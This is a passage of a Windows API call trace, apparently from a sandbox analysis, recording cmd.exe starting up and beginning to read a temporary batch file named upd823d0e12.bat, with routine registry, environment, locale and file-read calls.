_Env=0x9e50f0, _DoWildCard=0, _StartInfo=0x9e50fc | out: _Argc=0x9e50e8, _Argv=0x9e50ec, _Env=0x9e50f0) returned 0 [0080.441] GetCurrentThreadId () returned 0xcb0 [0080.441] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcb0) returned 0x84 [0080.441] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76460000 [0080.442] GetProcAddress (hModule=0x76460000, lpProcName="SetThreadUILanguage") returned 0x764a2780 [0080.442] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.453] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0080.453] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fcf0 | out: phkResult=0x26fcf0*=0x0) returned 0x2 [0080.454] VirtualQuery (in: lpAddress=0x26fcf7, lpBuffer=0x26fca8, dwLength=0x1c | out: lpBuffer=0x26fca8*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0080.454] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fca8, dwLength=0x1c | out: lpBuffer=0x26fca8*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0080.454] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fca8, dwLength=0x1c | out: lpBuffer=0x26fca8*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0080.454] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fca8, dwLength=0x1c | out: lpBuffer=0x26fca8*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0080.454] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fca8, dwLength=0x1c | out: lpBuffer=0x26fca8*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0080.454] GetConsoleOutputCP () returned 0x1b5 [0080.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9ee460 | out: lpCPInfo=0x9ee460) returned 1 [0080.463] SetConsoleCtrlHandler (HandlerRoutine=0x9df980, Add=1) returned 1 [0080.463] _get_osfhandle (_FileHandle=1) returned 0x3c [0080.464] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0080.511] _get_osfhandle (_FileHandle=1) returned 0x3c [0080.511] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9ee40c | out: lpMode=0x9ee40c) returned 1 [0080.519] _get_osfhandle (_FileHandle=1) returned 0x3c [0080.519] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0080.536] _get_osfhandle (_FileHandle=0) returned 0x38 [0080.536] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x9ee408 | out: lpMode=0x9ee408) returned 1 [0080.547] _get_osfhandle (_FileHandle=0) returned 0x38 [0080.547] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0080.575] GetEnvironmentStringsW () returned 0x327e00 [0080.576] FreeEnvironmentStringsA (penv="A") returned 1 [0080.576] GetEnvironmentStringsW () returned 0x327e00 [0080.576] FreeEnvironmentStringsA (penv="A") returned 1 [0080.576] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ec54 | out: phkResult=0x26ec54*=0x94) returned 0x0 [0080.577] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x0, lpData=0x26ec60*=0x50, lpcbData=0x26ec5c*=0x1000) returned 0x2 [0080.577] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x4, lpData=0x26ec60*=0x1, lpcbData=0x26ec5c*=0x4) returned 0x0 [0080.577] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x0, lpData=0x26ec60*=0x1, lpcbData=0x26ec5c*=0x1000) returned 0x2 [0080.577] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x4, lpData=0x26ec60*=0x0, lpcbData=0x26ec5c*=0x4) returned 0x0 [0080.577] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x4, lpData=0x26ec60*=0x40, lpcbData=0x26ec5c*=0x4) returned 0x0 [0080.577] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x4, lpData=0x26ec60*=0x40, lpcbData=0x26ec5c*=0x4) returned 0x0 [0080.577] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x0, lpData=0x26ec60*=0x40, lpcbData=0x26ec5c*=0x1000) returned 0x2 [0080.577] RegCloseKey (hKey=0x94) returned 0x0 [0080.578] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ec54 | out: phkResult=0x26ec54*=0x94) returned 0x0 [0080.578] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x0, lpData=0x26ec60*=0x40, lpcbData=0x26ec5c*=0x1000) returned 0x2 [0080.578] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x4, lpData=0x26ec60*=0x1, lpcbData=0x26ec5c*=0x4) returned 0x0 [0080.578] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x0, lpData=0x26ec60*=0x1, lpcbData=0x26ec5c*=0x1000) returned 0x2 [0080.578] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x4, lpData=0x26ec60*=0x0, lpcbData=0x26ec5c*=0x4) returned 0x0 [0080.579] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x4, lpData=0x26ec60*=0x9, lpcbData=0x26ec5c*=0x4) returned 0x0 [0080.579] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x4, lpData=0x26ec60*=0x9, lpcbData=0x26ec5c*=0x4) returned 0x0 [0080.579] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ec58, lpData=0x26ec60, lpcbData=0x26ec5c*=0x1000 | out: lpType=0x26ec58*=0x0, lpData=0x26ec60*=0x9, lpcbData=0x26ec5c*=0x1000) returned 0x2 [0080.579] RegCloseKey (hKey=0x94) returned 0x0 [0080.579] time (in: timer=0x0 | out: timer=0x0) returned 0x57ff8f52 [0080.580] srand (_Seed=0x57ff8f52) [0080.580] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat\"" [0080.580] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat\"" [0080.580] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x9f6720 | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x23 [0080.581] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x329d40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0080.581] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x9ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0080.581] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x9ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0080.581] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x9ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0080.582] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0080.582] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0080.582] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0080.582] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0080.582] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0080.582] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0080.582] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0080.582] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0080.583] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0080.583] GetEnvironmentStringsW () returned 0x327e00 [0080.584] FreeEnvironmentStringsA (penv="A") returned 1 [0080.584] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x9ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0080.584] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x9ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0080.584] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0080.585] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0080.585] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0080.585] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0080.585] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0080.585] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0080.585] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0080.585] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0080.586] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fa2c | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x23 [0080.586] GetFullPathNameW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop", nBufferLength=0x104, lpBuffer=0x26fa2c, lpFilePart=0x26fa24 | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop", lpFilePart=0x26fa24*="Desktop") returned 0x23 [0080.586] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x11 [0080.587] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f7a8 | out: lpFindFileData=0x26f7a8) returned 0x3205c8 [0080.588] FindClose (in: hFindFile=0x3205c8 | out: hFindFile=0x3205c8) returned 1 [0080.589] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe", lpFindFileData=0x26f7a8 | out: lpFindFileData=0x26f7a8) returned 0x3205c8 [0080.589] FindClose (in: hFindFile=0x3205c8 | out: hFindFile=0x3205c8) returned 1 [0080.589] _wcsnicmp (_String1="WI2YHM~1", _String2="WI2yhmtI onvScY7Pe\\Desktop", _MaxCount=0x12) returned 10 [0080.590] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop", lpFindFileData=0x26f7a8 | out: lpFindFileData=0x26f7a8) returned 0x3205c8 [0080.590] FindClose (in: hFindFile=0x3205c8 | out: hFindFile=0x3205c8) returned 1 [0080.590] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x11 [0080.591] SetCurrentDirectoryW (lpPathName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\desktop")) returned 1 [0080.591] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 1 [0080.591] GetEnvironmentStringsW () returned 0x327e00 [0080.592] FreeEnvironmentStringsA (penv="=") returned 1 [0080.592] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x9f6720 | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x23 [0080.619] GetConsoleOutputCP () returned 0x1b5 [0080.651] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9ee460 | out: lpCPInfo=0x9ee460) returned 1 [0080.651] GetUserDefaultLCID () returned 0x409 [0080.651] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x9f24a0, cchData=8 | out: lpLCData=":") returned 2 [0080.651] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fb5c, cchData=128 | out: lpLCData="0") returned 2 [0080.651] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fb5c, cchData=128 | out: lpLCData="0") returned 2 [0080.652] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fb5c, cchData=128 | out: lpLCData="1") returned 2 [0080.652] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x9f24b0, cchData=8 | out: lpLCData="/") returned 2 [0080.652] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x9f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0080.652] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x9f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0080.652] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x9f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0080.652] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x9f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0080.652] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x9f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0080.652] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x9f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0080.652] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x9f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0080.652] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x9f24c0, cchData=8 | out: lpLCData=".") returned 2 [0080.652] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x9f24e0, cchData=8 | out: lpLCData=",") returned 2 [0080.652] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0080.654] GetConsoleTitleW (in: lpConsoleTitle=0x32aaa8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0080.671] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76460000 [0080.671] GetProcAddress (hModule=0x76460000, lpProcName="CopyFileExW") returned 0x7647fa80 [0080.671] GetProcAddress (hModule=0x76460000, lpProcName="IsDebuggerPresent") returned 0x7647a790 [0080.671] GetProcAddress (hModule=0x76460000, lpProcName="SetConsoleInputExeNameW") returned 0x770b35c0 [0080.678] _wcsicmp (_String1="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat", _String2=")") returned 58 [0080.678] _wcsicmp (_String1="FOR", _String2="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat") returned 3 [0080.678] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat") returned 3 [0080.678] _wcsicmp (_String1="IF", _String2="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat") returned 6 [0080.678] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat") returned 6 [0080.678] _wcsicmp (_String1="REM", _String2="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat") returned 15 [0080.678] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat") returned 15 [0080.680] GetConsoleTitleW (in: lpConsoleTitle=0x26f848, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0080.680] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.680] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.681] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f600, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f5f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f5f8*=0x30565e9e, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0080.682] _wcsnicmp (_String1="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat", _String2="cmd ", _MaxCount=0x4) returned -51 [0080.682] SetErrorMode (uMode=0x0) returned 0x0 [0080.682] SetErrorMode (uMode=0x1) returned 0x0 [0080.682] GetFullPathNameW (in: lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x328e10, lpFilePart=0x26f354 | out: lpBuffer="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp", lpFilePart=0x26f354*="Temp") returned 0x24 [0080.682] SetErrorMode (uMode=0x0) returned 0x1 [0080.683] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\.") returned 1 [0080.683] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x9ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0080.691] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.691] FindFirstFileExW (in: lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat", fInfoLevelId=0x1, lpFindFileData=0x26f100, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f100) returned 0x32b300 [0080.692] FindClose (in: hFindFile=0x32b300 | out: hFindFile=0x32b300) returned 1 [0080.692] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0080.692] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0080.692] GetConsoleTitleW (in: lpConsoleTitle=0x26f5d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0080.693] ApiSetQueryApiSetPresence () returned 0x0 [0080.693] ResolveDelayLoadedAPI () returned 0x744614a0 [0080.733] SaferWorker () returned 0x0 [0080.793] SetErrorMode (uMode=0x0) returned 0x0 [0080.793] SetErrorMode (uMode=0x1) returned 0x0 [0080.793] GetFullPathNameW (in: lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat", nBufferLength=0x104, lpBuffer=0x32afb0, lpFilePart=0x26f484 | out: lpBuffer="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat", lpFilePart=0x26f484*="upd823d0e12.bat") returned 0x34 [0080.793] SetErrorMode (uMode=0x0) returned 0x1 [0080.794] CmdBatNotificationStub () returned 0x1 [0080.794] CreateFileW (lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat" (normalized: "c:\\users\\wi2yhm~1\\appdata\\local\\temp\\upd823d0e12.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f514, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0080.794] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0080.794] _get_osfhandle (_FileHandle=3) returned 0xb4 [0080.794] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.795] _get_osfhandle (_FileHandle=3) returned 0xb4 [0080.795] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.795] RtlAcquireSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0080.795] ReadFile (in: hFile=0xb4, lpBuffer=0x9fa960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f4e4, lpOverlapped=0x0 | out: lpBuffer=0x9fa960*, lpNumberOfBytesRead=0x26f4e4*=0xd0, lpOverlapped=0x0) returned 1 [0080.796] RtlReleaseSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0080.796] SetFilePointer (in: hFile=0xb4, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0080.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x9fa960, cbMultiByte=11, lpWideCharStr=0x9e57e0, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11 [0080.796] _get_osfhandle (_FileHandle=3) returned 0xb4 [0080.796] GetFileType (hFile=0xb4) returned 0x1 [0080.796] _get_osfhandle (_FileHandle=3) returned 0xb4 [0080.796] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0080.797] _wcsicmp (_String1="echo", _String2=")") returned 60 [0080.798] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0080.798] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0080.798] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0080.798] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0080.798] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0080.798] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0080.800] _tell (_FileHandle=3) returned 11 [0080.800] _close (_FileHandle=3) returned 0 [0080.801] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0080.801] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0080.801] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0080.801] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0080.801] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0080.801] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0080.801] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0080.801] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0080.801] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0080.801] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0080.802] GetConsoleTitleW (in: lpConsoleTitle=0x26f0c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0080.819] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0080.819] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0080.819] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0080.819] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0080.819] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0080.819] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0080.820] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0080.820] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0080.820] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0080.820] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0080.821] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0080.821] _get_osfhandle (_FileHandle=1) returned 0x3c [0080.821] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0080.827] _get_osfhandle (_FileHandle=1) returned 0x3c [0080.827] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9ee40c | out: lpMode=0x9ee40c) returned 1 [0080.848] _get_osfhandle (_FileHandle=0) returned 0x38 [0080.848] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x9ee408 | out: lpMode=0x9ee408) returned 1 [0080.888] SetConsoleInputExeNameW () returned 0x1 [0080.888] GetConsoleOutputCP () returned 0x1b5 [0080.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9ee460 | out: lpCPInfo=0x9ee460) returned 1 [0080.903] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.919] CreateFileW (lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat" (normalized: "c:\\users\\wi2yhm~1\\appdata\\local\\temp\\upd823d0e12.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f514, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0080.919] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0080.919] _get_osfhandle (_FileHandle=3) returned 0xb4 [0080.919] SetFilePointer (in: hFile=0xb4, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0080.920] _get_osfhandle (_FileHandle=3) returned 0xb4 [0080.920] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0080.920] RtlAcquireSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0080.920] ReadFile (in: hFile=0xb4, lpBuffer=0x9fa960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f4e4, lpOverlapped=0x0 | out: lpBuffer=0x9fa960*, lpNumberOfBytesRead=0x26f4e4*=0xc5, lpOverlapped=0x0) returned 1 [0080.920] RtlReleaseSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0080.921] SetFilePointer (in: hFile=0xb4, lDistanceToMove=15, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0080.921] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x9fa960, cbMultiByte=4, lpWideCharStr=0x9e57e0, cchWideChar=8191 | out: lpWideCharStr=":d\r\no off\r\n") returned 4 [0080.921] _get_osfhandle (_FileHandle=3) returned 0xb4 [0080.921] GetFileType (hFile=0xb4) returned 0x1 [0080.921] _get_osfhandle (_FileHandle=3) returned 0xb4 [0080.921] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0080.922] _tell (_FileHandle=3) returned 15 [0080.923] _close (_FileHandle=3) returned 0 [0080.923] CreateFileW (lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat" (normalized: "c:\\users\\wi2yhm~1\\appdata\\local\\temp\\upd823d0e12.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f514, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0080.923] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0080.924] _get_osfhandle 